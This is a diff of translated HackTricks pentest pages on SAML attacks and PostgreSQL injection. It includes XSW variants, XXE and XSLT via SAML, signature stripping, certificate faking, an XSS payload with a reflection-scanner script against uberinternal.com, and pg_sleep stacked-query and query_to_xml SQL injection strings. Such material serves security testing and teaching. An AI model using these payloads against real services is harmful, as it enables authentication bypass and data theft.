* **加入** 💬 [**Discord小组**](https://discord.gg/hRep4RUj7f)或[**电报小组**](https://t.me/peass),或在**Twitter**上关注我们 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,20 +1,21 @@
# SAML攻击
# SAML 攻击
## SAML攻击
## SAML 攻击
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 基本信息
@ -24,13 +25,13 @@
## 工具
[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor):一个工具可以接收URL或URL列表并返回SAML消费URL
[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor):一个可以接受 URL 或 URL 列表并返回 SAML 消费 URL 的工具
## XML往返
## XML 往返
XML中XML的签名部分保存在内存中然后执行一些编码/解码操作并检查签名。理想情况下,该编码/解码不应更改数据,但基于该场景,**正在检查的数据和原始数据可能不相同**。
XML 中,签名部分的 XML 被保存在内存中,然后进行一些编码/解码,并检查签名。理想情况下,这种编码/解码不应该改变数据,但基于这种情况,**被检查的数据和原始数据可能不相同**。
例如,请查看以下代码:
例如,检查以下代码:
```ruby
require 'rexml/document'
@ -45,99 +46,99 @@ puts "First child in original doc: " + doc.root.elements[1].name
doc = REXML::Document.new doc.to_s
puts "First child after round-trip: " + doc.root.elements[1].name
```
运行该程序针对 REXML 3.2.4 或更早版本将导致输出如下
运行该程序针对 REXML 3.2.4 或更早版本将导致以下输出:
```
First child in original doc: Y
First child after round-trip: Z
```
这是REXML从上述程序中看到的原始XML文档
这是REXML如何查看上述程序的原始XML文档的
![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../.gitbook/assets/image (1001).png>)
这是经过一轮解析和序列化后REXML看到的情况
这是它在经过一轮解析和序列化后的样子
![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../.gitbook/assets/image (445).png>)
有关此漏洞及如何利用它的更多信息:
有关此漏洞及其滥用方式的更多信息:
* [https://mattermost.com/blog/securing-xml-implementations-across-the-web/](https://mattermost.com/blog/securing-xml-implementations-across-the-web/)
* [https://joonas.fi/2021/08/saml-is-insecure-by-design/](https://joonas.fi/2021/08/saml-is-insecure-by-design/)
## XML签名包装攻击
在**XML签名包装攻击XSW**中,对手利用一种漏洞即在XML文档通过两个不同阶段处理时出现的漏洞**签名验证**和**函数调用**。这些攻击涉及更改XML文档结构。具体来说攻击者**注入伪造元素**这些元素不会损害XML签名的有效性。这种操纵旨在在**应用逻辑**分析的元素与**签名验证模块**检查的元素之间创建差异。因此,虽然XML签名在技术上仍然有效并通过验证但应用逻辑处理**欺诈元素**。因此攻击者有效地绕过了XML签名的**完整性保护**和**来源认证**从而实现了**注入任意内容**而不被检测
在**XML签名包装攻击XSW**中,攻击者利用XML文档在两个不同阶段处理时出现的漏洞**签名验证**和**功能调用**。这些攻击涉及改变XML文档结构。具体而言攻击者**注入伪造元素**这些元素不会影响XML签名的有效性。这种操控旨在造成**应用逻辑**分析的元素与**签名验证模块**检查的元素之间的差异。因此,尽管XML签名在技术上仍然有效并通过验证但应用逻辑处理的是**欺诈元素**。因此攻击者有效地绕过了XML签名的**完整性保护**和**来源认证**使得**任意内容的注入**得以在不被检测的情况下进行
以下攻击基于[**博客文章**](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/) **和** [**论文**](https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91.pdf)。因此,请查看这些内容以获取更多详细信息。
以下攻击基于[**这篇博客文章**](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/) **和** [**这篇论文**](https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91.pdf)。因此,请查看这些以获取更多详细信息。
### XSW #1
* **策略**:添加一个包含签名的新根元素。
* **影响**验证器可能会在合法的“Response -> Assertion -> Subject”和攻击者的“恶意新Response -> Assertion -> Subject”之间产生混淆,导致数据完整性问题。
* **影响**验证器可能会在合法的“Response -> Assertion -> Subject”和攻击者的“恶意新Response -> Assertion -> Subject”之间感到困惑,从而导致数据完整性问题。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-1.svg](<../../.gitbook/assets/image (506).png>)
### XSW #2
* **与XSW #1的区别**:使用分离签名而不是封装签名。
* **影响**与XSW #1类似,“恶意”结构旨在在完整性检查后欺骗业务逻辑。
* **与XSW #1的区别**:使用分离签名而不是封装签名。
* **影响**“恶意”结构类似于XSW #1,旨在欺骗完整性检查后的业务逻辑。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-2.svg](<../../.gitbook/assets/image (466).png>)
### XSW #3
* **策略**:在与原始断言相同的层次结构级别上制作一个恶意断言。
* **影响**旨在使业务逻辑混淆以使用恶意数据。
* **策略**:在与原始断言相同的层级上构造一个恶意断言。
* **影响**意图使业务逻辑混淆,以使用恶意数据。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-3.svg](<../../.gitbook/assets/image (120).png>)
### XSW #4
* **与XSW #3的区别**:原始断言变为重复的(恶意)断言的子级
* **影响**类似于XSW #3,但更积极地改变XML结构。
* **与XSW #3的区别**:原始断言成为复制(恶意)断言的子元素
* **影响**与XSW #3类似,但更激进地改变XML结构。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-4.svg](<../../.gitbook/assets/image (551).png>)
### XSW #5
* **独特方面**:签名和原始断言不符合标准配置(封装/封装/分离)。
* **影响**:复制的断言包含签名,修改了预期的文档结构。
* **独特方面**:签名和原始断言不符合标准配置(封装/封装/分离)。
* **影响**:复制的断言封装了签名,修改了预期的文档结构。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-5.svg](<../../.gitbook/assets/image (1030).png>)
### XSW #6
* **策略**与XSW #4和#5类似的位置插入,但有一个转折
* **影响**:复制的断言包含签名,然后包含原始断言,创建一个嵌套的欺骗结构。
* **策略**与XSW #4和#5类似的位置插入,但有一个变化
* **影响**:复制的断言封装了签名,然后封装了原始断言,创建了一个嵌套的欺骗结构。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-6.svg](<../../.gitbook/assets/image (169).png>)
### XSW #7
* **策略**:插入一个Extensions元素其中包含复制的断言作为子元素。
* **影响**:利用Extensions元素的较少限制模式来绕过模式验证对策特别是在OpenSAML等库中。
* **策略**:插入一个扩展元素,复制的断言作为子元素。
* **影响**:利用扩展元素的较少限制的模式绕过模式验证对策特别是在像OpenSAML这样的库中。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-7.svg](<../../.gitbook/assets/image (971).png>)
### XSW #8
* **与XSW #7的区别**利用另一个较少限制的XML元素进行攻击的变体
* **影响**:原始断言变为较少限制元素的子元素,颠倒了XSW #7中使用的结构
* **与XSW #7的区别**利用另一个较少限制的XML元素进行变体攻击。
* **影响**:原始断言成为较少限制元素的子元素,反转了XSW #7中使用的结构
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-8.svg](<../../.gitbook/assets/image (541).png>)
### 工具
您可以使用Burp扩展[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)来解析请求应用您选择的任何XSW攻击并启动它。
您可以使用Burp扩展[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)来解析请求应用您选择的任何XSW攻击并发起它。
## XXE
如果您不知道XXE是哪种攻击,请阅读以下页面:
如果您不知道XXE攻击是什么,请阅读以下页面:
{% content-ref url="../xxe-xee-xml-external-entity.md" %}
[xxe-xee-xml-external-entity.md](../xxe-xee-xml-external-entity.md)
{% endcontent-ref %}
SAML响应是**压缩和Base64编码的XML文档**可能容易受到XML外部实体XXE攻击的影响。通过操纵SAML响应的XML结构攻击者可以尝试利用XXE漏洞。以下是这种攻击的可视化方式
SAML响应是**解压缩和Base64编码的XML文档**可能会受到XML外部实体XXE攻击的影响。通过操控SAML响应的XML结构攻击者可以尝试利用XXE漏洞。以下是这种攻击的可视化方式
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
@ -155,23 +156,23 @@ SAML响应是**压缩和Base64编码的XML文档**可能容易受到XML外部
<ds:SignatureValue>...</ds:SignatureValue>
[...]
```
## 工具
## Tools
您还可以使用Burp扩展[SAML Raider](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)来生成从SAML请求中生成POC以测试可能存在的XXE漏洞和SAML漏洞。
您还可以使用 Burp 扩展 [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) 从 SAML 请求生成 POC以测试可能的 XXE 漏洞和 SAML 漏洞。
还可以查看这个讲座:[https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.youtube.com/watch?v=WHn-6xHL7mI)
还可以查看这个演讲: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.youtube.com/watch?v=WHn-6xHL7mI)
## 通过SAML进行XSLT
## XSLT via SAML
有关XSLT的更多信息请访问
有关 XSLT 的更多信息,请访问:
{% content-ref url="../xslt-server-side-injection-extensible-stylesheet-language-transformations.md" %}
[xslt-server-side-injection-extensible-stylesheet-language-transformations.md](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
{% endcontent-ref %}
可扩展样式表语言转换XSLT可用于将XML文档转换为各种格式如HTML、JSON或PDF。需要注意的是**XSLT转换是在数字签名验证之前执行的**。这意味着即使没有有效签名,攻击也可能成功;自签名或无效签名就足以继续。
可扩展样式表语言转换 (XSLT) 可用于将 XML 文档转换为各种格式,如 HTML、JSON 或 PDF。重要的是要注意 **XSLT 转换在数字签名验证之前执行**。这意味着即使没有有效的签名,攻击也可以成功;自签名或无效签名也足以继续。
在这里,您可以找到一个**POC**来检查这种漏洞,您可以在本节开头提到的hacktricks页面中找到有效载荷。
在这里,您可以找到一个 **POC** 来检查这种漏洞,在本节开头提到的 hacktricks 页面中可以找到有效载荷。
```xml
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
...
@ -191,49 +192,51 @@ SAML响应是**压缩和Base64编码的XML文档**可能容易受到XML外部
...
</ds:Signature>
```
### 工具
### Tool
您还可以使用Burp扩展程序[SAML Raider](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)生成来自SAML请求的POC以测试可能存在的XSLT漏洞。
您还可以使用 Burp 扩展 [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) 从 SAML 请求生成 POC以测试可能的 XSLT 漏洞。
还可以查看这个讲座:[https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.youtube.com/watch?v=WHn-6xHL7mI)
还可以查看这个演讲: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.youtube.com/watch?v=WHn-6xHL7mI)
## XML签名排除 <a href="#xml-signature-exclusion" id="xml-signature-exclusion"></a>
## XML Signature Exclusion <a href="#xml-signature-exclusion" id="xml-signature-exclusion"></a>
**XML签名排除**观察了SAML实现在Signature元素不存在时的行为。如果缺少此元素则**可能不会进行签名验证**,从而存在漏洞。可以通过更改通常由签名验证的内容来测试这一点。
**XML Signature Exclusion** 观察 SAML 实现的行为,当 Signature 元素不存在时。如果该元素缺失,**可能不会进行签名验证**,使其变得脆弱。可以通过更改通常由签名验证的内容来测试这一点。
![https://epi052.gitlab.io/notes-to-self/img/saml/signature-exclusion.svg](<../../.gitbook/assets/image (457).png>)
### 工具 <a href="#xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a>
### Tool <a href="#xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a>
您还可以使用Burp扩展程序[SAML Raider](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)。拦截SAML响应然后单击`Remove Signatures`。这样会删除**所有**签名元素
您还可以使用 Burp 扩展 [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)。拦截 SAML 响应并点击 `Remove Signatures`。这样,**所有** Signature 元素将被移除
除签名后,允许请求继续发送到目标。如果服务不需要签名
在移除签名后,允许请求继续发送到目标。如果服务不需要签名
## 证书伪造 <a href="#certificate-faking" id="certificate-faking"></a>
## Certificate Faking <a href="#certificate-faking" id="certificate-faking"></a>
证书伪造是一种测试**服务提供商SP是否正确验证SAML消息是否由受信任的身份提供商IdP签名**的技术。它涉及使用**自签名证书**对SAML响应或断言进行签名有助于评估SP和IdP之间的信任验证过程。
## Certificate Faking
### 如何进行证书伪造
Certificate Faking 是一种测试 **服务提供者 (SP) 是否正确验证 SAML 消息是否由受信任的身份提供者 (IdP) 签名** 的技术。它涉及使用 \***自签名证书** 来签署 SAML 响应或声明,这有助于评估 SP 和 IdP 之间的信任验证过程。
以下步骤概述了使用[SAML Raider](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) Burp扩展程序的过程
### 如何进行 Certificate Faking
1. 拦截SAML响应。
2. 如果响应包含签名,请使用`Send Certificate to SAML Raider Certs`按钮将证书发送到SAML Raider Certs。
3. 在SAML Raider Certificates选项卡中选择导入的证书然后单击`Save and Self-Sign`以创建原始证书的自签名克隆。
4. 返回到Burp代理中拦截的请求。从XML签名下拉菜单中选择新的自签名证书。
5. 使用`Remove Signatures`按钮删除任何现有签名。
6. 使用适当的**`(Re-)Sign Message`**或**`(Re-)Sign Assertion`**按钮,使用新证书对消息或断言进行签名。
7. 转发已签名的消息。成功的身份验证表明SP接受由您的自签名证书签名的消息揭示了SAML消息验证过程中的潜在漏洞。
以下步骤概述了使用 [SAML Raider](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) Burp 扩展的过程:
## 令牌接收者混淆 / 服务提供商目标混淆 <a href="#token-recipient-confusion" id="token-recipient-confusion"></a>
1. 拦截 SAML 响应。
2. 如果响应包含签名,使用 `Send Certificate to SAML Raider Certs` 按钮将证书发送到 SAML Raider Certs。
3. 在 SAML Raider 证书选项卡中,选择导入的证书并点击 `Save and Self-Sign` 创建原始证书的自签名克隆。
4. 返回到 Burp 的代理中拦截的请求。从 XML Signature 下拉菜单中选择新的自签名证书。
5. 使用 `Remove Signatures` 按钮移除任何现有签名。
6. 使用 **`(Re-)Sign Message`** 或 **`(Re-)Sign Assertion`** 按钮(视情况而定)使用新证书签署消息或声明。
7. 转发签名消息。成功的身份验证表明 SP 接受由您的自签名证书签署的消息,揭示 SAML 消息验证过程中的潜在漏洞。
令牌接收者混淆和服务提供商目标混淆涉及检查**服务提供商是否正确验证响应的预期接收者**。实质上服务提供商应拒绝认证响应如果它是为不同提供商而设计的。关键元素在于SAML响应的**SubjectConfirmationData**元素中的**Recipient**字段。该字段指定了必须发送断言的URL。如果实际接收者与预期的服务提供商不匹配则应将断言视为无效。
## Token Recipient Confusion / Service Provider Target Confusion <a href="#token-recipient-confusion" id="token-recipient-confusion"></a>
Token Recipient Confusion 和 Service Provider Target Confusion 涉及检查 **服务提供者是否正确验证响应的预期接收者**。本质上,如果身份验证响应是针对不同提供者的,服务提供者应该拒绝该响应。这里的关键元素是 **Recipient** 字段,位于 SAML 响应的 **SubjectConfirmationData** 元素中。该字段指定一个 URL指示声明必须发送到哪里。如果实际接收者与预期的服务提供者不匹配则该声明应被视为无效。
#### **工作原理**
要使SAML令牌接收者混淆SAML-TRC攻击可行必须满足一定条件。首先在服务提供商称为SP-Legit上必须有一个有效帐户。其次目标服务提供商SP-Target必须接受来自为SP-Legit提供服务的同一身份提供商的令牌。
为了使 SAML Token Recipient Confusion (SAML-TRC) 攻击可行,必须满足某些条件。首先,服务提供者上必须有一个有效的帐户(称为 SP-Legit。其次目标服务提供者SP-Target必须接受来自同一身份提供者的令牌该身份提供者为 SP-Legit 提供服务
在这些条件下,攻击过程很简单。通过共享的身份提供商与SP-Legit启动一个真实会话。拦截来自身份提供商发送到SP-Legit的SAML响应。然后将最初针对SP-Legit的拦截的SAML响应重定向到SP-Target。攻击的成功取决于SP-Target接受断言并授予对使用于SP-Legit的相同帐户名的资源的访问权限
在这些条件下,攻击过程是直接的。通过共享的身份提供者与 SP-Legit 启动一个真实会话。身份提供者到 SP-Legit 的 SAML 响应被拦截。然后将这个原本针对 SP-Legit 的拦截 SAML 响应重定向到 SP-Target。攻击成功的标准是 SP-Target 接受该声明,从而允许访问与用于 SP-Legit 的相同帐户名下的资源
```python
# Example to simulate interception and redirection of SAML Response
def intercept_and_redirect_saml_response(saml_response, sp_target_url):
@ -254,25 +257,25 @@ return "SAML Response successfully redirected to SP-Target."
except Exception as e:
return f"Failed to redirect SAML Response: {e}"
```
## 在注销功能中的 XSS 攻击
## XSS 在注销功能中的应用
可以通过[此链接](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/)访问原始研究
原始研究可以通过 [this link](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/) 访问。
在目录强制搜索过程中,发现了一个注销页面位于
在目录暴力破解的过程中,发现了一个注销页面
```
https://carbon-prototype.uberinternal.com:443/oidauth/logout
```
访问此链接,发生了重定向到:
访问此链接,发生了重定向到:
```
https://carbon-prototype.uberinternal.com/oidauth/prompt?base=https%3A%2F%2Fcarbon-prototype.uberinternal.com%3A443%2Foidauth&return_to=%2F%3Fopenid_c%3D1542156766.5%2FSnNQg%3D%3D&splash_disabled=1
```
表明`base`参数接受一个URL。考虑到这一点想法是用`javascript:alert(123);`替换URL试图发起XSS跨站脚本攻击。
揭示了 `base` 参数接受一个 URL。考虑到这一点出现了用 `javascript:alert(123);` 替代 URL 的想法,以尝试发起 XSS跨站脚本攻击。
### 大规模利用
[根据这项研究](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/)
[来自这项研究](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/)
使用[SAMLExtractor](https://github.com/fadyosman/SAMLExtractor)工具分析`uberinternal.com`的子域,查找使用相同库的域。随后,开发了一个脚本来针对`oidauth/prompt`页面。该脚本通过输入数据并检查其是否反映在输出中来测试XSS跨站脚本。在输入确实反映的情况下脚本将标记该页面存在漏洞
[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor) 工具被用来分析 `uberinternal.com` 的子域,以寻找使用相同库的域。随后,开发了一个脚本来针对 `oidauth/prompt` 页面。该脚本通过输入数据并检查其是否反映在输出中来测试 XSS跨站脚本。在输入确实被反映的情况下脚本将该页面标记为易受攻击
```python
import requests
import urllib3
@ -290,23 +293,24 @@ doesit = Fore.GREEN + "yes"
print(Fore.WHITE + url2)
print(Fore.WHITE + "Len : " + str(len(request.content)) + " Vulnerable : " + doesit)
```
## 参考资料
## 参考文献
* [https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)
* [https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/)\\
* [https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/)
* [https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/)
{% hint style="success" %}
学习和实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,55 +1,56 @@
# PostgreSQL注入
# PostgreSQL 注入
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对**黑客职业**感兴趣并想要黑掉无法黑掉的东西 - **我们正在招聘!**(需要流利的波兰语书面和口语表达能力)。
如果你对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_).
{% embed url="https://www.stmcyber.com/careers" %}
***
**本页面旨在解释不同的技巧,这些技巧可以帮助您利用在postgresql数据库中发现的SQL注入漏洞并补充您可以在** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) **上找到的技巧。**
**本页面旨在解释不同的技巧,帮助你利用在 PostgreSQL 数据库中发现的 SQL 注入,并补充你可以在** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) **上找到的技巧。**
## 网络交互 - 特权升级、端口扫描、NTLM挑战响应泄露和数据泄露
## 网络交互 - 权限提升、端口扫描、NTLM 挑战响应泄露与外泄
**PostgreSQL模块 `dblink`** 提供了连接到其他PostgreSQL实例并执行TCP连接的功能。这些功能与`COPY FROM`功能结合使用可以实现特权升级、端口扫描和NTLM挑战响应捕获等操作。有关执行这些攻击的详细方法,请查看如何[执行这些攻击](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md)。
**PostgreSQL 模块 `dblink`** 提供了连接到其他 PostgreSQL 实例和执行 TCP 连接的能力。这些功能结合 `COPY FROM` 功能,使得权限提升、端口扫描和 NTLM 挑战响应捕获等操作成为可能。有关执行这些攻击的详细方法,请查看如何 [执行这些攻击](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md)。
### 使用dblink和大对象进行数据泄露的示例
### **使用 dblink 和大对象的外泄示例**
您可以查看[**此示例**](dblink-lo\_import-data-exfiltration.md) 来查看一个CTF示例演示了如何将数据加载到大对象中然后将大对象内容泄露到函数`dblink_connect`的用户名中
你可以 [**阅读这个示例**](dblink-lo\_import-data-exfiltration.md) 来查看一个 CTF 示例,**如何在大对象中加载数据,然后在函数 `dblink_connect` 的用户名中外泄大对象的内容**
## PostgreSQL攻击读/写、RCE、权升
## PostgreSQL 攻击:读/写、RCE、权限提
查看如何从PostgreSQL中妥协主机并提升特权
查看如何从 PostgreSQL 破坏主机并提升权限
{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %}
[pentesting-postgresql.md](../../../network-services-pentesting/pentesting-postgresql.md)
{% endcontent-ref %}
## WAF绕过
## WAF 绕过
### PostgreSQL字符串函数
### PostgreSQL 字符串函数
操纵字符串可以帮助您**绕过WAF或其他限制**。\
[**在此页面**](https://www.postgresqltutorial.com/postgresql-string-functions/) **您可以找到一些有用的字符串函数。**
操纵字符串可以帮助**绕过 WAF 或其他限制**。\
[**在此页面**](https://www.postgresqltutorial.com/postgresql-string-functions/)**你可以找到一些有用的字符串函数。**
### 堆叠查询
请记住PostgreSQL支持堆叠查询但是当期望只返回1个响应时多个应用程序会在返回2个响应时抛出错误。但是仍然可以通过时间注入滥用堆叠查询:
请记住PostgreSQL 支持堆叠查询,但如果在期望仅返回 1 个响应时返回 2 个响应,许多应用程序会抛出错误。但是,你仍然可以通过时间注入滥用堆叠查询:
```
id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
@ -58,19 +59,19 @@ id=1; select pg_sleep(10);-- -
**query\_to\_xml**
此函数将以XML格式在一个文件中返回所有数据。如果您想要在一行中转储大量数据,这将是理想选择
此函数将以XML格式返回所有数据,仅在一个文件中。如果您想在一行中转储大量数据,这是理想的
```sql
SELECT query_to_xml('select * from pg_user',true,true,'');
```
**database\_to\_xml**
这个函数将以 XML 格式在只有 1 行中转储整个数据库(如果数据库非常庞大,可能会导致 DoS 攻击,甚至影响到您自己的客户端):
